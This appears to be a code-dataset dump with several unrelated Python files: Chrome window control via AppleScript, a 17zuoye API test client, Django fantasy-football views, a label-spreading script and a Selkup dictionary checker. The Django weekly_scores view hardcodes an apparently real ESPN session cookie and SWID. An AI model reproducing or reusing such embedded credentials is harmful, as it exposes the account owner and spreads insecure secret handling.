logging.debug(\"result:\\n%s\\n\" % stdout)\n return stdout.rstrip(\"\\n\")\n\n\n@log_func\ndef get_window_id_list():\n text = 
applescript_call(r\"\"\"\n \ttell application \"Google Chrome\"\n \t\tset window_number to 0\n \t\tset list_text to \"\"\n \t\trepeat with window_obj in windows\n \t\t\tset list_text to list_text & (id of window_obj as text) & \" \"\n \t\tend repeat\n \t\treturn list_text\n \tend tell\n \"\"\")\n text = text.strip()\n if text == \"\":\n return []\n return list(map(int, text.split(\" \")))\n\n\n@log_func\ndef bring_window_to_front_by_id(_id):\n applescript_call(r\"\"\"\n\ttell application \"Google Chrome\"\n\tset window_number to 0\n\trepeat with window_obj in windows\n\t\tset window_number to window_number + 1\n\t\tif %d is id of window_obj then\n\t\t\t# https://stackoverflow.com/questions/10366003/applescript-google-chrome-activate-a-certain-window/16727145#16727145\n\t\t\t# changing the index raises the window, but for example keyboard shortcuts are still registered by the previously frontmost window.\n\t\t\twindow_number\n\t\t\tset index of window window_number to 1\n\t\t\tactivate\n\t\t\texit repeat\n\t\tend if\n\t\t\n\tend repeat\n\t\nend tell\n \"\"\" % _id)\n # applescript_call(r\"\"\"\n # tell application \"Google Chrome\"\n # set window_number to 0\n # repeat with window_obj in windows\n # set window_number to window_number + 1\n # if %d is id of window_obj then\n # tell application \"System Events\" to tell process \"Google Chrome\"\n # perform action \"AXRaise\" of window window_number\n # set frontmost to true\n # end tell\n # exit repeat\n # end if\n #\n # end repeat\n #\n # end tell\n # \"\"\" % _id)\n\n\n@log_func\ndef get_windows():\n csv_text = applescript_call(r\"\"\"\n on GetChromeWindowListCSV()\n \ttell application \"Google Chrome\"\n \t\tset window_number to 0\n \t\tset csv_text to \"id,number,title\n\"\n\n \t\trepeat with window_obj in windows\n \t\t\tset window_number to window_number + 1\n \t\t\tset csv_text to csv_text & (id of window_obj as text) & \",\" & window_number & \",\\\"\" & title of window_obj & \"\\\"\n\"\n \t\tend repeat\n\n \t\treturn csv_text\n \tend tell\n end GetChromeWindowListCSV\n GetChromeWindowListCSV()\n \"\"\")\n # print(csv_text)\n import csv, io\n csv_f = io.StringIO(csv_text)\n reader = csv.DictReader(csv_f)\n result = []\n for row in reader:\n result.append({\n \"title\": row[\"title\"].strip(),\n \"id\": int(row[\"id\"].strip()),\n \"number\": int(row[\"number\"].strip()),\n })\n csv_f.close()\n return result\n", "sub_path": "resources/base_assistance.app/Contents/MacOS/apple_script.py", "file_name": "apple_script.py", "file_ext": "py", "file_size_in_byte": 3546, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "timeit.default_timer", "line_number": 10, "usage_type": "call"}, {"api_name": "timeit.default_timer", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 15, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 23, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 23, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 27, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 113, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 114, "usage_type": "call"}]} +{"seq_id": "233354515", "text": "# coding = utf-8\r\nimport requests\r\nimport json\r\nfrom common.common import common as co\r\nfrom api.api_base.api_base import api_base as api_base\r\n\r\nclass 
work_comment():\r\n    def __init__(self):\r\n        # The endpoints below are documented at: http://wiki.17zuoye.net/pages/viewpage.action?pageId=38923827\r\n        pass\r\n\r\n    # Get the review-lesson list for the poetry course (this endpoint may misbehave because Xuerui sometimes turns it off)\r\n    def query_courseList(self,mobile,student_id,lesson_id):\r\n        '''\r\n        :param mobile:\r\n        :param student_id:\r\n        :param lesson_id: the course id, e.g. Poetry 1-1 is 1, Poetry 3 is 2010, Poetry 2-2 is 11\r\n        :return:\r\n        '''\r\n        # https://www.test.17zuoye.net/parentmobile/studytogether/workcomment/courselist.vpage?lesson_id=2010&sid=333927829\r\n        url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n        url = url + \"parentmobile/studytogether/workcomment/courselist.vpage\"\r\n        params = {\"lesson_id\": lesson_id, \"sid\": student_id}\r\n        headers = api_base().get_yqx_login_cookie(mobile)\r\n        result = requests.get(url=url, params=params, headers=headers).text\r\n        return result\r\n\r\n    # Show the content of a review lesson\r\n    def poemContent_vpage(self,mobile,student_id,course_id):\r\n        '''\r\n        :param mobile:\r\n        :param student_id:\r\n        :param course_id: the id (on the Java side) of the lesson with the review feature inside each course lesson, of the form 5b487b5946e5e271752ea1f2\r\n        :return:\r\n        '''\r\n        url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n        url = url + \"parentmobile/studytogether/workcomment/poemcontent.vpage\"\r\n        params = {\"course_id\":course_id,\"sid\":student_id}\r\n        headers = api_base().get_yqx_login_cookie(mobile)\r\n\r\n        result = requests.get(url=url,params=params,headers=headers).text\r\n        return result\r\n\r\n    # Save a poem recording\r\n    def upload_voice(self,mobile,student_id,voice_url,course_id):\r\n        '''\r\n        :param mobile:\r\n        :param student_id:\r\n        :param voice_url:\r\n        :param course_id: the id (on the Java side) of the lesson with the review feature inside each course lesson, of the form 5b487b5946e5e271752ea1f2\r\n        :return:\r\n        '''\r\n        url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n        url = url + \"parentmobile/studytogether/workcomment/uploadvoice.vpage\"\r\n        data = {\"sid\":student_id,\"url\":voice_url,\"course_id\":course_id}\r\n        headers = api_base().get_yqx_login_cookie(mobile)\r\n        result = requests.post(url=url,data=data,headers=headers).text\r\n        return result\r\n\r\n    # Share a poem recording\r\n    def share_voice(self,mobile,student_id,course_id):\r\n        '''\r\n        :param mobile:\r\n        :param student_id:\r\n        :param course_id: the id (on the Java side) of the lesson with the review feature inside each course lesson, of the form 5b487b5946e5e271752ea1f2\r\n        :return:\r\n        '''\r\n        url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n        url = url + \"parentmobile/studytogether/workcomment/share.vpage\"\r\n        params = {\"student_id\":student_id,\"course_id\":course_id}\r\n        headers = api_base().get_yqx_login_cookie(mobile)\r\n        result = requests.get(url=url,params=params,headers=headers).text\r\n        return result\r\n\r\n    # Purchase a free course\r\n    def freeCourse_buy(self,mobile,student_id,course_id):\r\n        '''\r\n        About this function: for a free course, is_buy from the poemcontent endpoint defaults to false on entry; after tapping \"claim for free (limited time)\", is_buy becomes true\r\n        :param mobile:\r\n        :param student_id:\r\n        :param course_id:\r\n        :return:\r\n        '''\r\n        url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n        url = url + \"parentmobile/studytogether/workcomment/buy.vpage\"\r\n        data = {\"sid\": student_id, \"course_id\": course_id}\r\n        headers = api_base().get_yqx_login_cookie(mobile)\r\n        result = requests.post(url=url, data=data, headers=headers).text\r\n        return result\r\n\r\n    # Get a student's feedback\r\n    def load_feedback(self,mobile,student_id,course_id):\r\n        '''\r\n        :param mobile:\r\n        :param student_id:\r\n        :param course_id: the id (on the Java side) of the lesson with the review feature inside each course lesson, of the form 5b487b5946e5e271752ea1f2\r\n        :return:\r\n        '''\r\n        url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n        url = url + \"parentmobile/studytogether/workcomment/loadfeedback.vpage\"\r\n        params = {\"sid\":student_id,\"course_id\":course_id}\r\n        headers = api_base().get_yqx_login_cookie(mobile)\r\n        result = requests.get(url=url,params=params,headers=headers).text\r\n        return result\r\n\r\n    # Save a student's feedback\r\n    def add_feedback(self,mobile,student_id,course_id,satisfaction,desc):\r\n        '''\r\n        About this function:\r\n        :param mobile:\r\n        :param student_id:\r\n        :param course_id:\r\n        :param satisfaction: int, satisfaction level, required. 0 = unsatisfied, 1 = satisfied\r\n        :param desc: feedback description, may be empty\r\n        :return:\r\n        '''\r\n\r\n        url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n        url = url + \"parentmobile/studytogether/workcomment/addfeedback.vpage\"\r\n        data = {\"sid\": student_id,\r\n                \"course_id\": course_id,\r\n                \"satisfaction\":satisfaction,\r\n                \"desc\":desc}\r\n        headers = api_base().get_yqx_login_cookie(mobile)\r\n        result = requests.post(url=url, data=data, headers=headers).text\r\n        return result\r\n\r\n    # Purchase a course with learning coins\r\n    def coin_buy(self,mobile,student_id,course_id):\r\n        '''\r\n        About this function:\r\n        :param mobile:\r\n        :param student_id:\r\n        :param course_id:\r\n        :return:\r\n        '''\r\n\r\n        url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n        url = url + \"parentmobile/studytogether/workcomment/coinbuy.vpage\"\r\n        data = {\"sid\": student_id, \"course_id\": course_id}\r\n        headers = api_base().get_yqx_login_cookie(mobile)\r\n        result = requests.post(url=url, data=data, headers=headers).text\r\n        return result\r\n\r\n    # Add learning coins for sharing\r\n    def add_coin(self,mobile,student_id,course_id):\r\n        '''\r\n        About this function:\r\n        :param mobile:\r\n        :param student_id:\r\n        :param course_id:\r\n        :return:\r\n        '''\r\n\r\n        url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n        url = url + \"parentmobile/studytogether/workcomment/addcoin.vpage\"\r\n        data = {\"sid\": student_id, \"course_id\": course_id}\r\n        headers = api_base().get_yqx_login_cookie(mobile)\r\n        result = requests.post(url=url, data=data, headers=headers).text\r\n        return result\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    workComment = work_comment()\r\n    # print(workComment.poemContent_vpage(\"12002001135\",\"333927829\",\"5b5ebd15777487595a0d6bc1\"))\r\n    # print(workComment.query_courseList(\"12002001135\",\"333927829\",\"2010\"))\r\n    # print(workComment.query_courseList(\"15564301632\", \"333928021\", \"2010\"))\r\n    # voice_url = \"https://cdn-va.17zuoye.cn/learntogether/share/poetry/LYESQRWHLZS02.mp3\"\r\n    voice_url = \"workcomment/test/2018/07/23/20180723114259664343.MP3\"\r\n    # print(workComment.upload_voice(\"12002001002\",\"333924192\",voice_url,\"5b57f2f5ac7459a0849b033f\"))\r\n    # print(workComment.share_voice(\"12002001135\",\"333927829\",\"5b5c33c47774873a7f7b4162\")) # 333928021\r\n    print(workComment.load_feedback(\"12002001135\",\"333927829\",\"5b6170da8edbc8a50b3029b0\"))\r\n    # print(workComment.add_feedback(\"12002001127\",\"333924596\",\"5b57f2f5ac7459a0849b033f\",0,\"我觉得你们一起学可以点评得更好!\"))\r\n    # print(workComment.coin_buy(\"12002001127\",\"333924596\",\"5b5ebca7777487595a0d6b95\"))\r\n    # print(workComment.add_coin(\"12002001135\",\"333927829\",\"5b5c1792ac74598d9bd58ca2\"))", "sub_path": "api/parent/work_comment/api_work_comment.py", "file_name": "api_work_comment.py", "file_ext": "py", "file_size_in_byte": 7925, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "common.common.common", "line_number": 21, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 24, "usage_type": 
"call"}, {"api_name": "requests.get", "line_number": 25, "usage_type": "call"}, {"api_name": "common.common.common", "line_number": 36, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 39, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "common.common.common", "line_number": 53, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 56, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 57, "usage_type": "call"}, {"api_name": "common.common.common", "line_number": 68, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 71, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 72, "usage_type": "call"}, {"api_name": "common.common.common", "line_number": 84, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 87, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 88, "usage_type": "call"}, {"api_name": "common.common.common", "line_number": 99, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 102, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 103, "usage_type": "call"}, {"api_name": "common.common.common", "line_number": 118, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 124, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 125, "usage_type": "call"}, {"api_name": "common.common.common", "line_number": 138, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 141, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 142, "usage_type": "call"}, {"api_name": "common.common.common", "line_number": 155, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 158, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 159, "usage_type": "call"}]} +{"seq_id": "268492495", "text": "from django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\nfrom .models import Post\nfrom .forms import PostForm\nfrom .ff_espn_api import League\n\n# Create your views here.\ndef homepage(request):\n\t# could have something like leagues = league(league_id)... 
here?\n\treturn render(request,'ff/homepage.html')\n\ndef post_list(request):\n\tposts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')\n\treturn render(request, 'ff/post_list.html', {'posts':posts})\n\t\ndef post_detail(request,pk):\n\tpost = get_object_or_404(Post, pk=pk)\n\treturn render(request, 'ff/post_detail.html',{'post':post})\n\t\ndef post_new(request):\n\tif request.method == \"POST\":\n\t\tform = PostForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tpost = form.save(commit=False)\n\t\t\tpost.author = request.user\n\t\t\tpost.published_date = timezone.now()\n\t\t\tpost.save()\n\t\t\treturn redirect('post_detail',pk=post.pk)\n\telse:\n\t\tform = PostForm()\n\treturn render(request, 'ff/post_edit.html', {'form':form})\n\t\ndef post_edit(request, pk):\n\tpost = get_object_or_404(Post,pk=pk)\n\tif request.method == \"POST\":\n\t\tform = PostForm(request.POST, instance=post)\n\t\tif form.is_valid():\n\t\t\tpost = form.save(commit=False)\n\t\t\tpost.author = request.user\n\t\t\tpost.published_date = timezone.now()\n\t\t\tpost.save()\n\t\t\treturn redirect('post_detail',pk=post.pk)\n\telse:\n\t\tform = PostForm(instance=post)\n\treturn render(request, 'ff/post_edit.html', {'form':form})\n\t\ndef weekly_scores(request):\n\t# Get all this info via a form in future. can use username and password apparently instead of espn_s2 and swid\n\tleague_id = 692156\n\tyear = 2019\n\tespn_s2 = 'AEBlxO7SfF6cuPjEvujvAbpQ5fmvr7oYPxIyQV9qsazYKOuNCN14sb%2FBGr4yOyXwUtLTS8a4igLp2SrraMI6lC1EoWiHHKPhUZyqMiS%2B7JCKSapXyDbqHnX8ur1Ga0q3d7sGe9i4gi8ZKbIqaZWhJBdEqqa2UXBDLrgoxpUade%2BzepUwahpfqOvzOr87TiXACwdcnRIqPmhXGW4SuPU8kMlLqWPgj3zL%2FGLKF%2B%2B2gZ1AQxgHUBXYIXpHatVRgWndZNPLIfehi8FV5Xmi8PZnWP2%2F'\n\tswid = \"{E9BFC86F-E2A7-4FD8-BFC8-6FE2A71FD8B5}\"\n\tleague = League(league_id, year, espn_s2, swid)\n\tteams = league.teams\n\ttop_scorer = league.top_scorer\n\tmatchups = league.scoreboard\n\treturn render(request, 'ff/weekly_scores.html',{'league':league})\n\ndef plot_test(request):\n\tfigure_or_data = [Scatter(x=[1, 2, 3], y=[3, 1, 6])]\n\n\tplot_html, plotdivid, width, height = _plot_html(\n\t\tfigure_or_data, True, 'test', True,\n\t\t'100%', '100%')\n\n\tresize_script = ''\n\tif width == '100%' or height == '100%':\n\t\tresize_script = (\n\t\t\t''\n\t\t\t''\n\t\t).format(id=plotdivid)\n\n\thtml = ''.join([\n\t\tplot_html,\n\t\tresize_script])\n\n\treturn render(request, 'dashboard.html', {'html': html,})", "sub_path": "ff/views_0.py", "file_name": "views_0.py", "file_ext": "py", "file_size_in_byte": 2807, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.shortcuts.render", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Post.objects.filter", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 13, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 13, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 13, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 14, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 17, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}, {"api_name": "forms.PostForm", "line_number": 22, 
"usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 26, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 26, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 28, "usage_type": "call"}, {"api_name": "forms.PostForm", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 34, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 34, "usage_type": "argument"}, {"api_name": "forms.PostForm", "line_number": 36, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 40, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 40, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 42, "usage_type": "call"}, {"api_name": "forms.PostForm", "line_number": 44, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 45, "usage_type": "call"}, {"api_name": "ff_espn_api.League", "line_number": 53, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 57, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "98403909", "text": "from __future__ import division\n\nimport os\nimport pandas as pd\nimport numpy as np\n\nfrom gensim import corpora\nfrom gensim import models\nfrom gensim.matutils import corpus2dense as c2d\nfrom scipy.optimize import minimize\n\nfrom Mongolab import Mongolab\nfrom processing import flatten\nfrom sklearn.semi_supervised import LabelSpreading\nfrom sklearn.preprocessing import RobustScaler\nfrom TokenProcessor import TokenProcessor\nfrom functools import partial\n\nfrom ipdb import set_trace as st\n\ndef __encodeTokens(tokens, tfidf, dictionary):\n # Does the following things in 'one' pass:\n # 1. Converts plaintext word tokens to a bag-of-words representation\n # 2. Converts the BoW representation to a TF-IDF representation\n # 3. Converts the TF-IDF representation from a sparse matrix to a normal matrix\n # 4. Flattens out the array to remove conversion artifacts from (3)\n return flatten(c2d([tfidf[dictionary.doc2bow(tokens)]], len(tfidf.idfs), num_docs=1))\n\ndef __encodeLabel(label):\n if label == 'no_agreement':\n return -1\n elif label == '1 Little or No Disclosure':\n return 1\n elif label == '2 Superficial Disclosure':\n return 2\n elif label == '3 Conventional Disclosure':\n return 3\n elif label == '4 Personal Disclosure':\n return 4\n elif label == '5 Intimate Disclosure':\n return 5\n else:\n raise ValueError(label)\n\ndef __getWeightedLabels(ls, intLabels=True):\n # Take the weighted average of the labels\n # This is a shortcut for identifying the median value\n # because the label distributions are encoded as binarized vectors\n result = [np.average(ls.classes_, weights=p) for p in ls.label_distributions_]\n result = np.nan_to_num(result)\n\n if intLabels:\n # Round each element and cast to an int\n result = np.around(result).astype(int)\n\n return result\n\ndef __score(data):\n # Start by assuming everything is badly labeled\n numErrors = len(data)\n idErrors = []\n\n # SHAME: This goes through every row of the dataframe,\n # which sort of... 
violates the purpose of Pandas .___.\n for host_id, r in data.iterrows():\n label1, label2, labelSpread = r.label_1, r.label_2, r.label_spread\n minVal, maxVal = min(label1, label2), max(label1, label2)\n\n # Label is 'correct' if it's within the human prediction range\n if labelSpread >= minVal and labelSpread <= maxVal:\n numErrors-= 1\n else:\n idErrors.append(host_id)\n\n return numErrors, idErrors\n\ndef createLS(alpha, gamma, data):\n # Scale training data and extract labels\n rs = RobustScaler()\n scaledFeats = rs.fit_transform(data.feat_tokens.tolist())\n trainLabels = data.label_train.tolist()\n\n # Run label spreading operation\n ls = LabelSpreading(kernel='rbf', alpha=alpha, gamma=gamma, max_iter=10000)\n ls.fit(scaledFeats, trainLabels)\n\n # Vote on the classification outcome and inject\n # the 'final' result into the dataframe\n data.loc[:, 'label_spread'] = __getWeightedLabels(ls)\n\n return data, ls\n\ndef propagate(params, data):\n alpha, gamma = params[0], params[1]\n data, _ = createLS(alpha, gamma, data)\n\n # Score only labels with no agreement because the rest\n # would result in a score of 0 anyway\n score, _ = __score(data[data.Answer == 'no_agreement'])\n\n return score\n\ndef main(optimize=False, saveCsv=True):\n AMT_DATA_PATH = os.path.join(os.getcwd(), 'data_labels', 'Batch_2182142_batch_results.csv')\n\n mg = Mongolab()\n tp = TokenProcessor()\n\n # Get City Data\n cityData = mg.getData('ny_us')\n cityData = cityData[['host_id', 'host_is_superhost', 'property_type', 'room_type']]\n cityData.loc[:, 'cleaned_tokens'] = tp.get('ny_us')\n cityData.set_index('host_id', inplace=True)\n\n # Get AMT Results\n amtData = pd.read_csv(AMT_DATA_PATH, engine='c')\n amtData = amtData[['host_id', 'Answer1', 'Answer2', 'Answer']]\n amtData.set_index('host_id', inplace=True)\n\n # Merge both dataframes and intersect by host_id\n data = pd.merge(cityData, amtData, left_index=True, right_index=True, how='inner')\n\n # Don't need these things lying around anymore!\n del cityData\n del amtData\n\n # Create TF-IDF transformer for tokens\n tokens = data.cleaned_tokens.tolist()\n dictionary = corpora.Dictionary(tokens)\n tfidf = models.TfidfModel(dictionary.doc2bow(t) for t in tokens)\n\n # Encode tokens into word vectors\n encTokens = partial(__encodeTokens, tfidf=tfidf, dictionary=dictionary)\n data.loc[:, 'feat_tokens'] = data.cleaned_tokens.map(lambda d: encTokens(d))\n\n # Marshall label data\n data.loc[:, 'label_train'] = data.Answer.map(lambda d: __encodeLabel(d))\n data.loc[:, 'label_1'] = data.Answer1.map(lambda d: __encodeLabel(d))\n data.loc[:, 'label_2'] = data.Answer2.map(lambda d: __encodeLabel(d))\n\n if optimize:\n optFunc = partial(propagate, data=data)\n\n # Initial values use scikit-learn defaults for the label spreader\n initValues = [0.2, 10]\n\n # Run Truncated Newton optimization to find alpha and gamma\n # that minimize the number of unresolved labels after classification\n res = minimize(optFunc, initValues, bounds=((0, 1), (0, None)), method='TNC', options={'eps': 0.5, 'disp': True})\n\n if res.success:\n alpha, gamma = res.x\n else:\n # TODO: Throw error\n pass\n else:\n # Values precomputed from running the optimization function above\n alpha, gamma = [0.17278286, 3.18163529]\n\n # Create a final version of the label spreader\n data, ls = createLS(alpha, gamma, data)\n _, errorIdx = __score(data[data.Answer == 'no_agreement'])\n\n # Resolve remaining bad labels by majority voting\n cols = ['label_1', 'label_2', 'label_spread']\n data.loc[errorIdx, cols[2]] = 
data.loc[errorIdx, cols].apply(np.median, axis=1, raw=True)\n\n # Clean up the house\n finalData = data.loc[:, ['host_is_superhost', 'property_type', 'room_type', 'cleaned_tokens', 'label_spread']]\n finalData.rename(columns={'label_spread': 'labels'}, inplace=True)\n\n if saveCsv:\n OUTPUT_PATH = os.path.join(os.getcwd(), 'classifier', 'results.csv')\n finalData.to_csv(OUTPUT_PATH)\n\n return finalData\n\nif __name__ == '__main__':\n main()\n", "sub_path": "labels.py", "file_name": "labels.py", "file_ext": "py", "file_size_in_byte": 6312, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "processing.flatten", "line_number": 27, "usage_type": "call"}, {"api_name": "gensim.matutils.corpus2dense", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.RobustScaler", "line_number": 79, "usage_type": "call"}, {"api_name": "sklearn.semi_supervised.LabelSpreading", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 104, "usage_type": "call"}, {"api_name": "Mongolab.Mongolab", "line_number": 106, "usage_type": "call"}, {"api_name": "TokenProcessor.TokenProcessor", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 116, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 121, "usage_type": "call"}, {"api_name": "gensim.corpora.Dictionary", "line_number": 129, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 129, "usage_type": "name"}, {"api_name": "gensim.models.TfidfModel", "line_number": 130, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 130, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 133, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 142, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 166, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 173, "usage_type": "call"}]} +{"seq_id": "14520626", "text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*\nimport codecs\nimport pymorphy2\nimport web_utils\nimport html_utils\nimport dictionary_utils\nimport os\n\n__author__ = \"gisly\"\n\nmorph = pymorphy2.MorphAnalyzer()\nYAT_WORDS = 'dictionaries/resources/yat_words.txt'\nYAT = 'ѣ'\nOUT_OF_VOC_WORDS = None\n\nOUT_OF_VOC_WORDS_FILENAME = 'dictionaries/resources/out_of_voc_words.txt'\n\nOLD_SPELLINGS = None\nOLD_SPELLINGS_FILENAME = 'dictionaries/resources/old_spellings.txt'\nOLD_SPELLING_DELIMITER = ':'\n\nSELKUP_SITE_URL = 'http://selkup.org/dict-search'\nSELKUP_INF_ENDING = 'гу'\n\nPYMORPHY_INF = 'INFN'\n\nSUFFIX_LIST = ['-ка', '-то']\nPREFIX_LIST = ['по-']\n\nRUSSIAN_ALPHABET = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'\nSELKUP_ALPHABET = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюяё̄е̄ы̄ӧӧ̄о̄ю̈ю̈̄ю̄я̄ӭӭ̄э̄ӓӓ̄āӱӱ̄ӯи̇и̇̄ӣдзӷӄӈҗҳҷ́'\nENGLISH_ALPHABET = 'abcdefghijklmnopqrstuvwxyz\\'‘'\nSPECIAL_CHARACTERS = '.,!\\?«»: 
–-\"’'\n\n\nTYPICAL_LENGTH = 20\n\ndef has_correct_characters(sentence, language_code):\n if language_code == 'rus':\n alphabet = RUSSIAN_ALPHABET + SPECIAL_CHARACTERS\n elif language_code == 'slk':\n alphabet = SELKUP_ALPHABET + SPECIAL_CHARACTERS\n elif language_code == 'en':\n alphabet = ENGLISH_ALPHABET + SPECIAL_CHARACTERS\n else:\n raise Exception('Unknown language code : %s' % language_code)\n sentence = sentence.lower()\n for letter in sentence:\n if letter not in alphabet:\n print(letter)\n return False\n return True\n\ndef check_pymorphy(word):\n cache_dictionaries()\n word_list = word.split(' ')\n for word_part in word_list:\n if not check_pymorphy_single(word_part):\n return False\n return True\n\ndef check_selkup_word(word, translation):\n CHECK_FUNCTIONS = [check_pos]\n\n for check_function in CHECK_FUNCTIONS:\n if not check_function(word, translation):\n return False\n return True\n\ndef check_dictionary(word, translation):\n rus_translation_str = ' '.join(translation)\n #selkup_from_dict_list = get_selkup_from_dictionary(rus_translation_str)\n selkup_from_dict_list = dictionary_utils.get_selkup_by_meaning(rus_translation_str)\n for selkup_from_dict in selkup_from_dict_list:\n if is_similar(word, selkup_from_dict):\n return True\n print(word, selkup_from_dict)\n return False\n\ndef check_pos(word, translation):\n for translation_part in translation:\n if is_infinitive(translation_part) and word.endswith('ту'):\n return False\n return True\n\ndef check_length(word, translation):\n return len(word) <= TYPICAL_LENGTH\n\n\n\ndef get_selkup_from_dictionary(translation):\n data = web_utils.get_url_data(SELKUP_SITE_URL, 'utf-8', {'word': translation,\n 'lemma': '1',\n 'lang': 'ru', })\n\n html_data = html_utils.transform_to_html(data)\n search_result = html_utils.get_first_html_tag(html_data, 'ol')\n res = []\n for element in search_result:\n children = element.xpath('child::node()')\n if children and not 'не найдено' in children[0]:\n res.append(children[0].text)\n return res\n\n\ndef is_similar(word1, word2):\n #TODO\n return word1.strip().lower() == word2.strip().lower()\n\ndef check_pymorphy_single(word):\n word = word.replace('́', '')\n if check_pymorphy_dict(word):\n return True\n for suffix in SUFFIX_LIST:\n if word.endswith(suffix) and check_pymorphy_dict(word[0:-len(suffix)]):\n return True\n\n for prefix in PREFIX_LIST:\n if word.startswith(prefix) and check_pymorphy_dict(word[len(prefix):]):\n return True\n return False\n\n\ndef check_pymorphy_dict(word):\n if word.lower() in OUT_OF_VOC_WORDS:\n return True\n return morph.parse(word)[0].is_known\n\ndef is_infinitive(word):\n morph_parse_results = morph.parse(word)\n for morph_parse_result in morph_parse_results:\n tag = morph_parse_result.tag\n if tag.POS == PYMORPHY_INF:\n return True\n return False\n\n\ndef change_old_spellings(word):\n for old_spelling in OLD_SPELLINGS.items():\n word = word.replace(old_spelling[0], old_spelling[1])\n return word\n\ndef cache_dictionaries():\n cache_out_of_voc_words()\n cache_old_spellings()\n\ndef cache_out_of_voc_words():\n global OUT_OF_VOC_WORDS\n if OUT_OF_VOC_WORDS is None:\n OUT_OF_VOC_WORDS = set()\n with codecs.open(OUT_OF_VOC_WORDS_FILENAME, 'r', 'utf-8') as fin:\n for line in fin:\n 